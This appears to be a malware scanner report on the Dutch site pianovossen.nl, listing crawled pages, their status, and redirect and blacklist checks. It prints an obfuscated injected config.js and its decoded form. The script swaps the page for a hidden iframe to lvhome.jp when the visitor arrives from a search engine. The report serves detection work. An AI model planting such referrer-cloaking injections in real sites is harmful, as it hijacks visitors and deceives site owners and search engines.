Scanned pages/files
Request | Server response | Status |
http://www.pianovossen.nl/ | HTTP/1.1 302 Found Cache-Control: private Date: Thu, 18 Dec 2014 12:27:32 GMT Location: /Default.aspx?H=1&S=1.1 Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=bl4fdx551rm1d145ylaq4czy; path=/ X-AspNet-Version: 1.1.4322 X-Powered-By: ASP.NET | clean |
http://www.pianovossen.nl/default.aspx?h=1&s=1.1 | 200 OK Content-Length: 21880 Content-Type: text/html | clean |
http://www.pianovossen.nl/DefaultPV.aspx?H=3&S=3.6 | 200 OK Content-Length: 25723 Content-Type: text/html | clean |
http://www.pianovossen.nl/DefaultPV.aspx?H=4&S=4.1 | 200 OK Content-Length: 28300 Content-Type: text/html | clean |
http://www.pianovossen.nl/Default.aspx?H=6&S=6.1 | 200 OK Content-Length: 20687 Content-Type: text/html | clean |
http://www.pianovossen.nl/ndzrtf/louis-vuitton-denim.html | 200 OK Content-Length: 5018 Content-Type: text/html | clean |
http://www.pianovossen.nl/ndzrtf/config.js | 200 OK Content-Length: 1296 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame.
eval(String.fromCharCode(118,97,114,32,114,101,103,101,120,112,61,47,92,46,40,97,111,108,124,103,111,111,103,108,101,124,121,111,117,100,97,111,124,121,97,104,111,111,124,98,105,110,103,124,49,49,56,49,49,52,124,98,105,115,111,124,103,111,117,103,111,117,124,105,102,101,110,103,124,105,118,99,124,115,111,111,117,108,101,124,110,105,117,104,117,124,98,105,115,111,41,40,92,46,91,97,45,122,48,45,57,92,45,93,43,41,123,49,44,50,125,92,47,63,47,105,103,5 ...[844 bytes skipped]...
Decoded script:
var regexp=/\.(aol|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\/?/ig;
var where=document.referrer;
if(regexp.test(where)){var body=document.body;body.style.visibility='visible';body.innerHTML="<iframe name='framain' frameborder='0' height='2500' scrolling='no' src='http://lvhome.jp' width='100%' />";}
http://www.pianovossen.nl/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.pianovossen.nl/Default.aspx?H=2&S=2.3 | 200 OK Content-Length: 25662 Content-Type: text/html | clean |
http://www.pianovossen.nl/10JaarPianoVossen.zip | 200 OK Content-Length: 302837 Content-Type: application/x-zip-compressed | clean |
http://www.pianovossen.nl/images/cdhoesje10JaarPianoVossen.zip | 200 OK Content-Length: 301477 Content-Type: application/x-zip-compressed | clean |
http://www.pianovossen.nl/defaultPV.aspx?H=2&S=2.2 | 200 OK Content-Length: 23950 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pianovossen.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pianovossen.nl
Referer: http://www.google.com/search?q=pianovossen.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pianovossen.nl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pianovossen.nl/
Result: pianovossen.nl is not infected or malware details are not published yet.